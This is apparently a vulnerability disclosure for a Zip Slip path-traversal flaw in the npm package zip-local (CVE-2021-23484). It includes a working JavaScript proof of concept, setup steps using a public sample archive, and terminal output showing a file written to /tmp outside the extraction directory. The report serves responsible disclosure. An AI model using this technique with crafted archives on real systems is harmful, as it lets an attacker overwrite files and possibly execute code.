Relative Path Traversal in mostafa-samir/zip-local
Reported on
Oct 13th 2021
Description
zip-local is vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip).
Proof of Concept
// PoC.js
var zipper = require('zip-local');

// unzip() reads the archive; the callback receives an object that can be
// written to disk with save() or kept in memory with memory()
zipper.unzip("zipslip.zip", function(error, unzipped) {
    if (!error) {
        // extract to the current working directory (null = cwd)
        unzipped.save(null, function() { });
        var unzippedfs = unzipped.memory();
    }
});
Execute the following commands:
1. npm install zip-local # Install the affected module
2. Download the zipslip example archive from https://github.com/snyk/zip-slip-vulnerability/blob/master/archives/zip-slip.zip and place it next to the PoC
3. node poc.js # Run the PoC
Running the PoC extracts "good.txt" to the current directory and "evil.txt" to the /tmp directory, outside the extraction target:
┌──(noob㉿Hacking)-[~/node_modules/zip-local]
└─$ ls
CHANGELOG.md LICENSE node_modules poc.js tests
libs main.js package.json README.md zipslip.zip
┌──(noob㉿Hacking)-[~/node_modules/zip-local]
└─$ ls /tmp
┌──(noob㉿Hacking)-[~/node_modules/zip-local]
└─$ node poc.js
┌──(noob㉿Hacking)-[~/node_modules/zip-local]
└─$ ls
CHANGELOG.md LICENSE package.json tests
good.txt main.js poc.js zipslip.zip
libs node_modules README.md
┌──(noob㉿Hacking)-[~/node_modules/zip-local]
└─$ ls /tmp
evil.txt
Impact
An arbitrary file write outside the extraction directory may lead to information disclosure, denial of service or remote code execution, depending on which files the extracting process can overwrite.
Got assigned with CVE-2021-23484. Thanks @Mostafa Samir and @zidingz 🎉